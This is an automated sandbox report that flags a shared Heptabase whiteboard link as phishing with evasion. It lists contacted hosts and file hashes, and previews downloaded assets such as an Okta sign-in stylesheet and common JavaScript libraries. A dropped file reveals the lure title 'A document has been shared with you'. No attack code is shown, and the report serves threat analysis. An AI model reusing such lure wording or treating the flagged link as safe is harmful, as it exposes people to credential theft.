                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        34.120.195.249
                                                                                                                                                                                                                        o1198943.ingest.sentry.ioUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                        192.168.2.17
                                                                                                                                                                                                                        192.168.2.18
                                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                        Analysis ID:1647358
                                                                                                                                                                                                                        Start date and time:2025-03-24 18:23:22 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                        Sample URL:https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:14
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        Analysis Mode:stream
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.phis.evad.win@23/65@70/234
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.65.174, 142.251.40.131, 142.251.41.14, 142.251.16.84, 142.251.40.206, 142.250.65.238, 142.250.64.78
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • VT rate limit hit for: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10017)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):10245
                                                                                                                                                                                                                        Entropy (8bit):5.437589264532084
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                                                                                                                                                        SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                                                                                                                                                        SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                                                                                                                                                        SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250324%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250324T172328Z&X-Amz-Expires=300&X-Amz-Signature=d5880db6b15e8535827ffcf6ad0fc5b0eba442c0d6eb640d138aec4dc09301b3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                        Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):227884
                                                                                                                                                                                                                        Entropy (8bit):5.446601817607305
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:297B45AB3255436B93C3ECDFAF3B722F
                                                                                                                                                                                                                        SHA1:5B79B97B649F7580628D387400F1401EA5A62452
                                                                                                                                                                                                                        SHA-256:18BD8637FEC16380BE7B68C3C832695E4C0FA37D7AAEBB7A85CEE332954195DD
                                                                                                                                                                                                                        SHA-512:97174527255126266F3249EEB6D6311203E1144EC9889860FBA4C65511CE110BFDB2DC33E12B0A32D0233B131B7771A08A62127A9B5D2DA08CDB94524C363EF0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/index-18bd8637.css
                                                                                                                                                                                                                        Preview:@charset "UTF-8";@font-face{font-family:Inter;font-style:normal;font-weight:100;font-display:swap;src:url(/assets/Inter-Thin-77d96c1c.woff2?v=3.19) format("woff2"),url(/assets/Inter-Thin-e6bced8e.woff?v=3.19) format("woff")}@font-face{font-family:Inter;font-style:italic;font-weight:100;font-display:swap;src:url(/assets/Inter-ThinItalic-d82beee8.woff2?v=3.19) format("woff2"),url(/assets/Inter-ThinItalic-70648e9b.woff?v=3.19) format("woff")}@font-face{font-family:Inter;font-style:normal;font-weight:200;font-display:swap;src:url(/assets/Inter-ExtraLight-b6cd094a.woff2?v=3.19) format("woff2"),url(/assets/Inter-ExtraLight-015dad27.woff?v=3.19) format("woff")}@font-face{font-family:Inter;font-style:italic;font-weight:200;font-display:swap;src:url(/assets/Inter-ExtraLightItalic-db229bf3.woff2?v=3.19) format("woff2"),url(/assets/Inter-ExtraLightItalic-32e53d8a.woff?v=3.19) format("woff")}@font-face{font-family:Inter;font-style:normal;font-weight:300;font-display:swap;src:url(/assets/Inter-Ligh
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 516431
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):154066
                                                                                                                                                                                                                        Entropy (8bit):7.997997941448596
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:0F714050B44551D3CDCD566C5AA98640
                                                                                                                                                                                                                        SHA1:600C1505DE631F810C5EE59B116EF5779B605305
                                                                                                                                                                                                                        SHA-256:EFDC7B3A8EF428C71B19EA4EDF88B5D575B209F88179E26BEE729C520EB05731
                                                                                                                                                                                                                        SHA-512:988A6591B156C7EE99799584148D27C5302AE9AA9FD91F4186601A170A8FB9ECA97B47B6F93CE071553CF031037C3C06A0A7E1C79B9A438B12D8543BEEBA187F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://js.intercomcdn.com/frame-modern.24099529.js
                                                                                                                                                                                                                        Preview:............W..(.W.o.W:{Eq...o.....BI....m.Yr$.....s...b...xo.sw...........*.KX.b.{..l4k.......}.z1.=.u..Y.4..M...0...N.0...f......I....V.....K..V........vP.....n.?w"7.EA%0.s.>.7...X....k.&.;..FQ...};..U.^.T&.3....V.p...o..I.Q8.$. t.n.......wzv.{uv}zPe.R...u.-=..].]9.a..g... ..Fl..gEn...n7b...M.(...<...m.56....#.G.....vs...Z.v...W.$_46j.mVo.7..@.hn...Y.V../b..........b`.....v.5.H...bc.U.f[[.mz.....f.5ZbV..|.F..v...h..vM.T......h.....@..._.............V.mn.x.n..j{.......B....bM..S3.j4`.-.Bm{..l..&@6...54..Xyk..7q....nln...(....F}Kt5S..Q...f......U..l.6.._....47p....u...h..j...j.z.....c....Z..|c..7..O......b..b..Yo..:?.I.#...k....}5.Fs..f...a..!...#L...=r..`.77.8.Y....6......."...65..s....m>R.v.Uknm.....H.I.V.....g..7d..-.1....(l.Q.=........P...c..pT.m.b.V...h.V[.K2V-..[..!...cl....n...Y:.F....6....F.D.u......5~......\.v}.!.]}LoV....H.[.?gP....Q8.bWb@.......1.&v6...%.g.u...o;...o$V.{............X..z.4M...q..s.Mh[G.K.......Wg.[.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 98868, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):98868
                                                                                                                                                                                                                        Entropy (8bit):7.997348664849209
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:DC131113894217B5031000575D9DE002
                                                                                                                                                                                                                        SHA1:F96348260751EA78B1D23E9557DB297290BDAF28
                                                                                                                                                                                                                        SHA-256:D612F1212B452AF07F1A5DEFB2B672E76A91F7139E7499FA48BB9B2B985C22D6
                                                                                                                                                                                                                        SHA-512:0AA4420C7B7DCC70238371F9D21D521D0673CAF4C1883EEB2D3254C5A1DAD941F4569F418350FFC61E93303466C504179B90BA0ACF008250DC9C2C6DDF6F850B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/Inter-Regular-d612f121.woff2?v=3.19
                                                                                                                                                                                                                        Preview:wOF2.......4..........................................F...J.`..........9..T..6.$..N. ..r...-[....Jl..\Z 8...B.J.....9..m..nN...g....?^.AD!.......J.u.YW.s..)..[.J.<...............o$.....}.y#/!a.....(.2.V.X.G.j$...!d1/:.P.U..(.C..1.3...,.G..Y.'..\....$s....Y...h.........C}...yE|.e.k..WK.b[U.P].b.P..J&U.......o...9..p...2...N#....)..U,..".=..q[...S..E...U..U...`......r.Vx...T.*K.."j....q....R\......1.J9w..H]<..w..A..\o..:./...U..n.G..S...>...Z3.....&4.z.......^...d..J}L.U].-?...z..M.(.u.t.v.......['...iNP..VP..3.....{D...((l...^.....=..P...=.'....ry..aa....\ba.m.#.^...d..p.|.g.l...e..o.CB..k..2:....b,.".......=a.5.l./..............@../y...<..w1.C.(imM9...jW..L`...~...a....#....8.....(.Xg.t.9...s...m.H.?.x.v...v.....z'k6.?..y~.c%....>..[%S...(..k.{....+......)s.=.....!.+...7C.../..G/.....!X:...6+-..,<...&..4.....^.S...E>|Gi0....?.?^..r.M..E...3FT.&;..9....<..Sw-:..f.z9.}=Kn......"&...8...^s.mf.B..9...oh.O...2...lj|.#.U.H'...{.`..X.....e .AZ...T...
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3497
                                                                                                                                                                                                                        Entropy (8bit):5.245457818182087
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4D50CEDFEFBF199BC205E29E350A8D0C
                                                                                                                                                                                                                        SHA1:0B60C4DF227B0AEDF1EFF5A108AEF79953FAE311
                                                                                                                                                                                                                        SHA-256:5CCDF426D69BC4B627C7CF73D429F561C27C22971C1C044A53CA4A39C46B4C33
                                                                                                                                                                                                                        SHA-512:E50EDC875A0528B954D4D9202614D77A7414E03B709650C500621B530DDB05D16E635089BBB0D2796D5C63C204A2A49E91537071B77125D9D20A09A6DE7442F5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:{"version":47,"whiteboards":[{"id":"c9bfc81f-fa96-4dff-99fa-279a46da3576","name":"A document has been shared with you","isTrashed":false,"createdTime":"2025-03-22T17:38:08.977Z","lastEditedTime":"2025-03-22T17:44:10.281Z","createdBy":"7bc20933-395c-4bea-b8ef-657e689f4461","spaceId":"addd4b9a-9dd1-485a-840f-8414f9db84cd"}],"cardInstances":[],"journalInstances":[{"width":520,"height":451.3125,"id":"53957dd4-d15d-4e2f-97af-52b931007493","whiteboardId":"c9bfc81f-fa96-4dff-99fa-279a46da3576","journalDate":"2025-03-24","color":"white","x":200,"y":200,"isFolded":false,"isAutoHeight":true,"createdTime":"2025-03-22T17:38:08.986Z","lastEditedTime":"2025-03-24T07:15:13.183Z","createdBy":"7bc20933-395c-4bea-b8ef-657e689f4461","spaceId":"addd4b9a-9dd1-485a-840f-8414f9db84cd","sourceSpaceId":"addd4b9a-9dd1-485a-840f-8414f9db84cd"}],"pdfCardInstances":[],"highlightElementInstances":[],"highlightElements":[],"mindMapInstances":[],"mindMapNodes":[],"mindMapTextNodes":[],"mindMapCardNodes":[],"mindMaps"
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Java source, Unicode text, UTF-8 text, with very long lines (1104)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1155
                                                                                                                                                                                                                        Entropy (8bit):5.406408241904235
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:0EE57876D30D923BEA481E9F0A6FBFA3
                                                                                                                                                                                                                        SHA1:4E94A181B88E4D647F1649344B8E19636574C4F7
                                                                                                                                                                                                                        SHA-256:C5C530EBE913CA95973C68B46FE8DE46562A9FE9E2F91561D5B04FA04227B39E
                                                                                                                                                                                                                        SHA-512:31D53C2E8D5DE623388275AC7B5DD2577C103C42837F2393A04C0CA3C1D19D6CA1F17B6255B85CD1A66E3D2ECE2435E89DF5DCA6007658FB267140E58D5D20C3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/GuestError-26f258d6.js
                                                                                                                                                                                                                        Preview:import{j as e,l as r,a8 as a}from"./accountApi-672c2e6f.js";import{S as i,L as s,o as n}from"./main-4c0c8700.js";import"./spark-md5-9953c3d1.js";import"./_commonjs-dynamic-modules-5cb9de4b.js";(function(){try{var t=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},d=new Error().stack;d&&(t._sentryDebugIds=t._sentryDebugIds||{},t._sentryDebugIds[d]="010ec337-6072-40d2-a3c3-13a73d463256",t._sentryDebugIdIdentifier="sentry-dbid-010ec337-6072-40d2-a3c3-13a73d463256")}catch{}})();function u(){return e("div",{className:"flex size-full items-center justify-center text-center",children:r("div",{className:"flex min-h-70 flex-col items-center gap-6",children:[e(i,{className:"size-20 rounded-[17.864px] shadow-card"}),r("div",{className:"text-body text-middle-hard-grey",children:[e("div",{className:"mb-3 text-2xl font-bold text-primary",children:"Whiteboard not found."}),e("div",{className:"text-body text-middle-hard-grey",children:"We couldn.t find that whiteboard you ar
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (51734)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):222931
                                                                                                                                                                                                                        Entropy (8bit):5.0213311632628725
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                                                                                                                                                                        SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                                                                                                                                                                        SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                                                                                                                                                                        SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                                                                                                                                                                        Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16479)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2219869
                                                                                                                                                                                                                        Entropy (8bit):5.506600694699013
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:D00F7C7AEC0D5D9BA3F53A9A3B7885B6
                                                                                                                                                                                                                        SHA1:9F47D70FD7D3097E7BCA7894748C6D9466618D70
                                                                                                                                                                                                                        SHA-256:83CF57209C4F23177D5D0BD1FAC639BDAC533412DDC5A65934BAABA31EA968F4
                                                                                                                                                                                                                        SHA-512:D57C96026B41719ED14112C735B54EEE7D7C31A2CD566ACD1C1F36EA741B9154B27AE810B63F82010F90297D67CE57E148312D24221498BE586621C4530CBCAF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/accountApi-672c2e6f.js
                                                                                                                                                                                                                        Preview:var Jbe=Object.defineProperty;var Qbe=(e,t,n)=>t in e?Jbe(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n;var Fe=(e,t,n)=>(Qbe(e,typeof t!="symbol"?t+"":t,n),n),uN=(e,t,n)=>{if(!t.has(e))throw TypeError("Cannot "+n)};var _=(e,t,n)=>(uN(e,t,"read from private field"),n?n.call(e):t.get(e)),me=(e,t,n)=>{if(t.has(e))throw TypeError("Cannot add the same private member more than once");t instanceof WeakSet?t.add(e):t.set(e,n)},be=(e,t,n,r)=>(uN(e,t,"write to private field"),r?r.call(e,n):t.set(e,n),n);var hn=(e,t,n)=>(uN(e,t,"access private method"),n);(function(){try{var e=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},t=new Error().stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="483fbd89-94d4-4b8c-9301-c883d4fc4fdf",e._sentryDebugIdIdentifier="sentry-dbid-483fbd89-94d4-4b8c-9301-c883d4fc4fdf")}catch{}})();function Ybe(e,t){for(var n=0;n<t.length;n++){const r=t[n];if(typeof r!="string"&&!Array.isArray(r)){for(const s in r)if
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1436
                                                                                                                                                                                                                        Entropy (8bit):5.096366528350575
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:145996EE069B006DE39D82FC013657AD
                                                                                                                                                                                                                        SHA1:9DE77EB2CD9FBD6E5EB7619E907C4B768A9D40C2
                                                                                                                                                                                                                        SHA-256:EB0210CC6701E5D9110543ABCF7F6AB8B19344FC8CFE05C82B40D620563BF7CE
                                                                                                                                                                                                                        SHA-512:A15AC8EFB05A4421684ED9553888F2932CE815404921177C835B3B677B73B286FFB4BCA884333CF780BADC8B61A297400F7BD21EDAC645515A5E692165BBAABE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://cdn.segment.com/v1/projects/DLoZj20J3fbiMh0k0lAp4MppFhSpND9Z/settings
                                                                                                                                                                                                                        Preview:{"_lastModified":"2025-03-12T19:13:13.665Z","integrations":{"Actions Amplitude":{"versionSettings":{"componentTypes":[]}},"Customer.io":{"datacenter":"","siteId":"f366c2f8d7eb9401bf18","versionSettings":{"version":"2.2.3","componentTypes":["browser","server"]},"type":"browser","bundlingStatus":"unbundled"},"Segment.io":{"apiKey":"DLoZj20J3fbiMh0k0lAp4MppFhSpND9Z","unbundledIntegrations":["Customer.io"],"addBundledMetadata":true,"maybeBundledConfigIds":{},"versionSettings":{"version":"4.4.7","componentTypes":["browser"]}}},"plan":{"track":{"__default":{"enabled":true,"integrations":{}}},"identify":{"__default":{"enabled":true}},"group":{"__default":{"enabled":true}}},"edgeFunction":{},"analyticsNextEnabled":true,"middlewareSettings":{},"enabledMiddleware":{},"metrics":{"sampleRate":0.1},"legacyVideoPluginsEnabled":false,"remotePlugins":[{"name":"Amplitude (Actions)","creationName":"Actions Amplitude","libraryName":"amplitude-pluginsDestination","url":"https://cdn.segment.com/next-integr
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, progressive, precision 8, 959x270, components 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):24109
                                                                                                                                                                                                                        Entropy (8bit):7.861380294037842
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4447E1E1E5D18D1902B83E63D7B5B2BD
                                                                                                                                                                                                                        SHA1:970AEC9BCE7F43C98349C6465D19FD2467F6E804
                                                                                                                                                                                                                        SHA-256:6708ED0373297BD2AF732A68B348B94BE1BD25F274A38DFCA4DE872349B9BFE9
                                                                                                                                                                                                                        SHA-512:1BB4E950B13732B6FF0FCF7E68BE71AC3908DF75FB6E802BA9C2F150BD60D99F55554F31AE407EB40B01BD929295EB58A0121387692CD6DC8994865EBD672847
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:......JFIF.............C....................................................................C............................................................................"...........................................................................................................\T.G....Z.H.....^&...;Gc..4M.........................................<..!....O.#..:.Lq.._.4.w.....J;a..;KaO.......................................2..\...JH............E...Kg.y.@................gWI9A........&.}.g..V<.W3.>.Xc ..................|.p..t.........12..zvX......qs...p............r0....D..:.j.y......./x{....sV....................L"....Z. ........!w...................F..>.GdZ....o_?B5X^.Z9....z...'T..y'...-.....]..|.i....V...6.......c...:n.?,..h.....G6. .x.5.=...#....H+.'O...\.....Ig...S~ .;U.C.....Qi.....................9.v|.E..j......y.e..A.S,..S.oH.....1....}|....wws..=.l.N..a...I..^V.x..C 7..:tU<...y.5..[.u..r.a.m....:.@.....}...e...........91.B...3..Lj..v7.lN.Uv.....S~........7?.-Zuf
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                        Entropy (8bit):3.875
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                        SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                        SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                        SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCeEH65-s18iiEgUNkWGVTiEcMUvMwcao_A==?alt=proto
                                                                                                                                                                                                                        Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 105804, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):105804
                                                                                                                                                                                                                        Entropy (8bit):7.9975388815479675
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:007AD31A53F4AB3F58EE74F2308482CE
                                                                                                                                                                                                                        SHA1:DFA9F8F3D79BF8A0001FE72EEADAD0490CBA59CC
                                                                                                                                                                                                                        SHA-256:152261291C938AA5AAD6A56D52B47FFCB893D1C0387E76D7F270A7382FF786D5
                                                                                                                                                                                                                        SHA-512:48AEF263ACA876BA4DB5A596FBB8332524D6B440A8A516E1BAA7899F2F1DA0E1C44452D0380869EC455D27A6E0B931210B1FB669B36E36914CA27235F34E8558
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/Inter-SemiBold-15226129.woff2?v=3.19
                                                                                                                                                                                                                        Preview:wOF2.......L.......@..................................@...J.`.......l.....T..6.$..N. ..$...-[73..O.....q....8Vg.A....._#..z.6..........!2.........2{..T..~..........................#...L...n....@.G..............m..(..!.N5..3..N....%..Y.$..i.(..V.n.G:L..K.eE|..!.hF..4..h.6F..D.h K.vRO1cT=..v...Z.l.9.{GsV..%.p.@...K*.IK\.Vb.=.g.#nm...f.1Y.m!.....M..'.P.vM".LBK.U....UI.6.F...d.y.Ej<.....l.R..N..;....!w....Q..%..;3...1...#.u4....W.tb.{.+d.....=c.F...#.|.?.......n.aV.l..p....A/..X.F...[........f.O...:..5.F..o'..{a..2......n..w.Q.d...B.O.\k.d...........=7...>.....@.B>zY~.e+>A.0".............n..7..4.%..........o.~.....=N.V..C.Z.......?.)Y...c.....[.|.OM..0["l.z...W[...I.......N..c!W/=.oX..e..f.5&G..g....#.."..b..&0.+...........H....#.P!..)Kgd...t.GLL..|0.x..Q.....56.6.Y.}...v2Y.....W.\.1\<6....?..~.1.#q....~.|F\....E..;.>..y...}.f....['.....sa?.6...{?......G.W............<......gZ.!Jr..Y=b..........G.....`.3{.".I.:...9..'...9.iLm..X.....?$..".p..g
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):48316
                                                                                                                                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
